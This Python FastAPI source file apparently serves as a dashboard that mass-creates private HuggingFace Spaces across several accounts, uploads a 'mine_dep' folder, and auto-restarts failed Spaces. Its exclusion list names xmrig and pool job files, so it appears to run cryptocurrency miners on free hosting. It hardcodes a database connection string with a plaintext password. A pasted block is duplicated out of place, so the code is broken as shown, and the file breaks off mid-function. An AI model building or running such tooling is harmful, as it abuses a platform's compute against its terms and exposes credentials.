#!/usr/bin/env python3 """ hf_spaces_status.py — HuggingFace Spaces Manager FastAPI web app to create, monitor, and manage HuggingFace Spaces for miners. """ import os import time import json import threading import requests from pathlib import Path from datetime import datetime, timezone from typing import Optional, Dict, List from contextlib import asynccontextmanager import uvicorn from fastapi import FastAPI, Request, BackgroundTasks from fastapi.responses import HTMLResponse, JSONResponse # ── Constants ───────────────────────────────────────────────────────────────── MINE_DIR = Path(__file__).parent / "mine_dep" DATABASE_URL = "postgresql://postgres.wqbxzautyxwsnxxhowfb:Lovyelias5584.@aws-1-eu-west-1.pooler.supabase.com:6543/postgres" UPLOAD_EXCLUDES = { "__pycache__", ".cache", "xmrig", "result.json", "pool_job.json", "xmrig_local_config.json", "Procfile", "railway.toml", ".railwayignore", } # ── Shared State ────────────────────────────────────────────────────────────── state: Dict = { "accounts": [], # [{username, token}] "spaces": [], # [{id, username, name, status, prefix, ...}] "log": [], "monitor_running": False, "monitor_stop": False, "monitor_wakeup": threading.Event(), # signal to wake monitor early "creation_in_progress": False, } state_lock = threading.Lock() def _log(msg: str, level: str = "INFO"): entry = { "time": datetime.now(timezone.utc).isoformat(), "level": level, "msg": msg, } with state_lock: state["log"].append(entry) if len(state["log"]) > 600: state["log"] = state["log"][-600:] print(f"[{level}] {msg}", flush=True) # ── HF API Helpers ──────────────────────────────────────────────────────────── def hf_headers(token: str) -> Dict: return {"Authorization": f"Bearer {token}"} def hf_create_space(username: str, token: str, space_name: str) -> Optional[Dict]: url = "https://huggingface.co/api/repos/create" payload = { "type": "space", "name": space_name, "private": True, "sdk": "docker", "hardware": "cpu-basic", } resp = requests.post(url, json=payload, headers=hf_headers(token), timeout=30) if resp.status_code in (200, 201): return resp.json() _log(f"Failed to create {username}/{space_name}: {resp.status_code} {resp.text[:200]}", "ERROR") return None def hf_upload_file(username, token, space_name, local_path, repo_path) -> bool: url = f"https://huggingface.co/api/spaces/{username}/{space_name}/upload/{repo_path}" try: with open(local_path, "rb") as f: content = f.read() resp = requests.post( url, headers={**hf_headers(token), "Content-Type": "application/octet-stream"}, data=content, timeout=60, ) return resp.status_code in (200, 201) except Exception as e: _log(f"Upload error for {repo_path}: {e}", "ERROR") return False def hf_set_secret(username, token, space_name, key, value) -> bool: url = f"https://huggingface.co/api/spaces/{username}/{space_name}/secrets" resp = requests.post(url, json={"key": key, "value": value}, headers=hf_headers(token), timeout=30) return resp.status_code in (200, 201, 204) def hf_get_runtime(space_id: str, token: str) -> Dict: url = f"https://huggingface.co/api/spaces/{space_id}/runtime" try: resp = requests.get(url, headers=hf_headers(token), timeout=15) if resp.status_code == 200: return resp.json() except Exception: pass return {} def hf_restart_space(space_id: str, token: str) -> bool: url = f"https://huggingface.co/api/spaces/{space_id}/restart" try: resp = requests.post(url, headers=hf_headers(token), timeout=30) return resp.status_code in (200, 201, 204) except Exception: return False def hf_list_spaces(username: str, token: str) -> List[Dict]: url = f"https://huggingface.co/api/spaces?author={username}&limit=200&full=true" try: resp = requests.get(url, headers=hf_headers(token), timeout=30) if resp.status_code == 200: return resp.json() except Exception: pass return [] def hf_delete_space(space_id: str, token: str) -> bool: url = "https://huggingface.co/api/repos/delete" space_name = space_id.split("/")[-1] payload = {"type": "space", "name": space_name} resp = requests.delete(url, json=payload, headers=hf_headers(token), timeout=30) if resp.status_code in (200, 201, 204): return True _log(f"Delete API Error for {space_id}: {resp.status_code} {resp.text[:200]}", "WARN") # Alternative endpoint if resp.status_code == 404: url2 = f"https://huggingface.co/api/spaces/{space_id}" resp2 = requests.delete(url2, headers=hf_headers(token), timeout=30) if resp2.status_code in (200, 201, 204): return True _log(f"Delete API Error 2 for {space_id}: {resp2.status_code} {resp2.text[:200]}", "WARN") return False # ── Creation Worker ─────────────────────────────────────────────────────────── def create_spaces_worker(username: str, token: str, prefix: str, count: int): with state_lock: state["creation_in_progress"] = True existing = [a["username"] for a in state["accounts"]] if username not in existing: state["accounts"].append({"username": username, "token": token}) # We use HfApi for folder upload from huggingface_hub import HfApi api = HfApi(token=token) for i in range(1, count + 1): space_name = f"{prefix}{i}" space_id = f"{username}/{space_name}" _log(f"[{i}/{count}] Creating space: {space_id}") result = hf_create_space(username, token, space_name) if result is None: with state_lock: state["spaces"].append({ "id": space_id, "username": username, "name": space_name, "status": "CREATE_FAILED", "prefix": prefix, "created_at": datetime.now(timezone.utc).isoformat(), "error": "Creation failed", }) continue _log(f" ✅ Space created: {space_id}") _log(f" ⬆️ Uploading files from {MINE_DIR.name}/ to {space_id}...") try: api.upload_folder( folder_path=str(MINE_DIR), repo_id=space_id, repo_type="space", ignore_patterns=list(UPLOAD_EXCLUDES) + ["*.pyc"] ) _log(f" 📁 Uploaded files successfully") ok_ct = len(list(MINE_DIR.glob("*"))) # just visual except Exception as e: _log(f" ❌ Upload failed: {e}", "ERROR") ok_ct = 0 env_ok = hf_set_secret(username, token, space_name, "DATABASE_URL", DATABASE_URL) _log(f" {'🔑 DATABASE_URL set' if env_ok else '⚠️ Failed to set DATABASE_URL'} on {space_id}", "INFO" if env_ok else "WARN") with state_lock: state["spaces"].append({ "id": space_id, "username": username, "name": space_name, "status": "BUILDING", "prefix": prefix, "created_at": datetime.now(timezone.utc).isoformat(), "error": "", "files_uploaded": ok_ct, }) time.sleep(1) with state_lock: state["creation_in_progress"] = False _log(f"🎉 Done creating {count} spaces with prefix '{prefix}'") # ── Delete Worker ───────────────────────────────────────────────────────────── def delete_spaces_worker(username: str, token: str): """Delete ALL spaces for this account (both tracked and fetched from HF).""" _log(f"🗑️ Fetching all spaces for @{username} to delete...") remote_spaces = hf_list_spaces(username, token) remote_ids = [s["id"] for s in remote_spaces] _log(f" Found {len(remote_ids)} spaces on HuggingFace for @{username}") deleted = 0 failed = 0 for sid in remote_ids: ok = hf_delete_space(sid, token) if ok: _log(f" 🗑️ Deleted {sid}") deleted += 1 else: _log(f" ❌ Failed to delete {sid}", "WARN") failed += 1 # Remove from local state with state_lock: state["spaces"] = [s for s in state["spaces"] if s["id"] != sid] _log(f"✅ Deletion complete: {deleted} deleted, {failed} failed for @{username}") # ── Monitor Worker ──────────────────────────────────────────────────────────── def _run_monitor_cycle(): """One scan cycle: fetch all spaces for all accounts, check runtimes, restart errors.""" with state_lock: accounts = list(state["accounts"]) if not accounts: return token_map = {a["username"]: a["token"] for a in accounts} _log(f"🔄 Monitor scanning {len(accounts)} account(s)...") # For each account, pull ALL spaces from HF (not just ones we created) for acc in accounts: username = acc["username"] token = acc["token"] remote = hf_list_spaces(username, token) for rs in remote: sid = rs.get("id") or f"{username}/{rs.get('modelId','?')}" # Get runtime rt = hf_get_runtime(sid, token) stage = rt.get("stage", "UNKNOWN") error = rt.get("errorMessage", "") hw = rt.get("hardware", {}) hw_curr = hw.get("current", "?") if isinstance(hw, dict) else str(hw) # Upsert into state with state_lock: existing = next((i for i, s in enumerate(state["spaces"]) if s["id"] == sid), None) entry = { "id": sid, "username": username, "name": sid.split("/")[-1], "status": stage, "error": error, "hardware": hw_curr, "prefix": "", "last_checked": datetime.now(timezone.utc).isoformat(), } if existing is None: entry["created_at"] = datetime.now(timezone.utc).isoformat() state["spaces"].append(entry) else: # preserve creation info state["spaces"][existing].update({ "status": stage, "error": error, "hardware": hw_curr, "last_checked": entry["last_checked"], }) if stage == "RUNTIME_ERROR": _log(f" ❌ {sid} → RUNTIME_ERROR — restarting...", "WARN") ok = hf_restart_space(sid, token) with state_lock: for s in state["spaces"]: if s["id"] == sid: s["status"] = "RESTARTING" if ok else "RESTART_FAILED" _log(f" {'✅ Restarted' if ok else '❌ Restart failed'}: {sid}") def monitor_worker(): """Background: scan all accounts immediately, then loop every 5 min.""" _log("🔍 Monitor thread started") with state_lock: state["monitor_running"] = True state["monitor_stop"] = False while True: with state_lock: if state["monitor_stop"]: break _run_monitor_cycle() # Wait up to 5 minutes but wake up early if signalled wakeup_event = state["monitor_wakeup"] wakeup_event.clear() wakeup_event.wait(timeout=300) # 5 min or wake signal with state_lock: if state["monitor_stop"]: break with state_lock: state["monitor_running"] = False _log("🛑 Monitor thread stopped") _monitor_thread: Optional[threading.Thread] = None def ensure_monitor_running(): """Start monitor if not running.""" global _monitor_thread with state_lock: running = state["monitor_running"] if not running: with state_lock: state["monitor_stop"] = False _monitor_thread = threading.Thread(target=monitor_worker, daemon=True) _monitor_thread.start() def wake_monitor(): """Signal monitor to run a cycle immediately.""" state["monitor_wakeup"].set() # ── FastAPI App ─────────────────────────────────────────────────────────────── @asynccontextmanager async def lifespan(app: FastAPI): global _monitor_thread _monitor_thread = threading.Thread(target=monitor_worker, daemon=True) _monitor_thread.start() yield with state_lock: state["monitor_stop"] = True wake_monitor() app = FastAPI(title="HF Spaces Manager", lifespan=lifespan) @app.get("/", response_class=HTMLResponse) async def dashboard(): return HTMLResponse(content=get_html()) @app.post("/api/create") async def api_create(req: Request, background_tasks: BackgroundTasks): body = await req.json() username = body.get("username", "").strip() token = body.get("token", "").strip() prefix = body.get("prefix", "").strip() count = int(body.get("count", 20)) if not username or not token or not prefix: return JSONResponse({"ok": False, "error": "username, token and prefix are required"}, status_code=400) if count < 1 or count > 50: return JSONResponse({"ok": False, "error": "count must be 1-50"}, status_code=400) with state_lock: if state["creation_in_progress"]: return JSONResponse({"ok": False, "error": "Creation already in progress"}, status_code=409) background_tasks.add_task(create_spaces_worker, username, token, prefix, count) return JSONResponse({"ok": True, "msg": f"Creating {count} spaces with prefix '{prefix}'"}) @app.post("/api/add-account") async def api_add_account(req: Request): body = await req.json() username = body.get("username", "").strip() token = body.get("token", "").strip() if not username or not token: return JSONResponse({"ok": False, "error": "username and token are required"}, status_code=400) with state_lock: existing = [a["username"] for a in state["accounts"]] if username in existing: # Update token if changed for a in state["accounts"]: if a["username"] == username: a["token"] = token added = False else: state["accounts"].append({"username": username, "token": token}) added = True _log(f"{'Account added' if added else 'Account token updated'}: @{username}") # Immediately trigger a monitor scan to pick up all spaces for this account ensure_monitor_running() wake_monitor() return JSONResponse({"ok": True, "added": added}) @app.get("/api/accounts") async def api_accounts(): with state_lock: return JSONResponse([{"username": a["username"]} for a in state["accounts"]]) # ── File Manager API ────────────────────────────────────────────────────────── @app.get("/api/files") async def api_list_files(): """List all files in the mine_dep directory""" if not MINE_DIR.exists(): MINE_DIR.mkdir(parents=True, exist_ok=True) files = [] for f in MINE_DIR.rglob("*"): if f.is_file(): # Filter out ignored/hidden files rel_path = f.relative_to(MINE_DIR).as_posix() if any(part.startswith('.') for part in rel_path.split('/')) or rel_path in UPLOAD_EXCLUDES or '__pycache__' in rel_path: continue files.append(rel_path) return JSONResponse({"ok": True, "files": sorted(files)}) @app.get("/api/files/{filename:path}") async def api_get_file(filename: str): """Read contents of a file in mine_dep""" target = (MINE_DIR / filename).resolve() if not str(target).startswith(str(MINE_DIR.resolve())): return JSONResponse({"ok": False, "error": "Invalid path"}, status_code=400) if not target.exists() or not target.is_file(): return JSONResponse({"ok": False, "error": "File not found"}, status_code=404) try: content = target.read_text(encoding="utf-8") return JSONResponse({"ok": True, "content": content}) except Exception as e: return JSONResponse({"ok": False, "error": str(e)}, status_code=500) @app.post("/api/files/{filename:path}") async def api_save_file(filename: str, req: Request): """Create or update a file in mine_dep""" target = (MINE_DIR / filename).resolve() if not str(target).startswith(str(MINE_DIR.resolve())): return JSONResponse({"ok": False, "error": "Invalid path"}, status_code=400) body = await req.json() content = body.get("content", "") try: target.parent.mkdir(parents=True, exist_ok=True) target.write_text(content, encoding="utf-8") _log(f"💾 File saved: {filename}") return JSONResponse({"ok": True, "msg": f"Saved {filename}"}) except Exception as e: return JSONResponse({"ok": False, "error": str(e)}, status_code=500) @app.delete("/api/files/{filename:path}") async def api_delete_file(filename: str): """Delete a file from mine_dep""" target = (MINE_DIR / filename).resolve() if not str(target).startswith(str(MINE_DIR.resolve())): return JSONResponse({"ok": False, "error": "Invalid path"}, status_code=400) if not target.exists() or not target.is_file(): return JSONResponse({"ok": False, "error": "File not found"}, status_code=404) try: target.unlink() _log(f"🗑️ File deleted: {filename}") return JSONResponse({"ok": True, "msg": f"Deleted {filename}"}) except Exception as e: return JSONResponse({"ok": False, "error": str(e)}, status_code=500) with state_lock: existing = [a["username"] for a in state["accounts"]] if username in existing: # Update token if changed for a in state["accounts"]: if a["username"] == username: a["token"] = token added = False else: state["accounts"].append({"username": username, "token": token}) added = True _log(f"{'Account added' if added else 'Account token updated'}: @{username}") # Immediately trigger a monitor scan to pick up all spaces for this account ensure_monitor_running() wake_monitor() return JSONResponse({"ok": True, "added": added}) @app.get("/api/accounts") async def api_accounts(): with state_lock: return JSONResponse([{"username": a["username"]} for a in state["accounts"]]) @app.post("/api/delete-spaces") async def api_delete_spaces(req: Request, background_tasks: BackgroundTasks): """Delete all HF spaces for a given account (uses saved token by default).""" body = await req.json() username = body.get("username", "").strip() token = body.get("token", "").strip() # Try to use saved token if none provided if not token: with state_lock: for a in state["accounts"]: if a["username"] == username: token = a["token"] break if not username or not token: return JSONResponse({"ok": False, "error": "username required (token from saved account or provide manually)"}, status_code=400) background_tasks.add_task(delete_spaces_worker, username, token) return JSONResponse({"ok": True, "msg": f"Deletion started for @{username}"}) @app.get("/api/stats") async def api_stats(): with state_lock: spaces = list(state["spaces"]) accounts = list(state["accounts"]) log = list(state["log"][-80:]) monitor = state["monitor_running"] creating = state["creation_in_progress"] running = sum(1 for s in spaces if s.get("status") == "RUNNING") building = sum(1 for s in spaces if s.get("status") in ("BUILDING", "APP_STARTING", "RESTARTING")) errors = sum(1 for s in spaces if "ERROR" in s.get("status", "")) sleeping = sum(1 for s in spaces if s.get("status") == "SLEEPING") return JSONResponse({ "accounts": len(accounts), "account_names": [a["username"] for a in accounts], "total_spaces": len(spaces), "running": running, "building": building, "error": errors, "sleeping": sleeping, "monitor_running": monitor, "creation_in_progress": creating, "spaces": spaces, "log": log, }) @app.post("/api/restart/{space_id:path}") async def api_restart_space(space_id: str): with state_lock: accounts = list(state["accounts"]) spaces = list(state["spaces"]) username = space_id.split("/")[0] token_map = {a["username"]: a["token"] for a in accounts} token = token_map.get(username) if not token: return JSONResponse({"ok": False, "error": "No saved token for that account"}, status_code=404) ok = hf_restart_space(space_id, token) if ok: with state_lock: for s in state["spaces"]: if s["id"] == space_id: s["status"] = "RESTARTING" _log(f"Manual restart triggered: {space_id}") return JSONResponse({"ok": ok}) @app.post("/api/monitor/stop") async def api_monitor_stop(): with state_lock: state["monitor_stop"] = True wake_monitor() return JSONResponse({"ok": True}) @app.post("/api/monitor/start") async def api_monitor_start(): ensure_monitor_running() wake_monitor() return JSONResponse({"ok": True}) @app.post("/api/monitor/scan-now") async def api_scan_now(): ensure_monitor_running() wake_monitor() _log("🔔 Instant scan triggered by user") return JSONResponse({"ok": True}) # ── HTML UI ─────────────────────────────────────────────────────────────────── def get_html() -> str: return r"""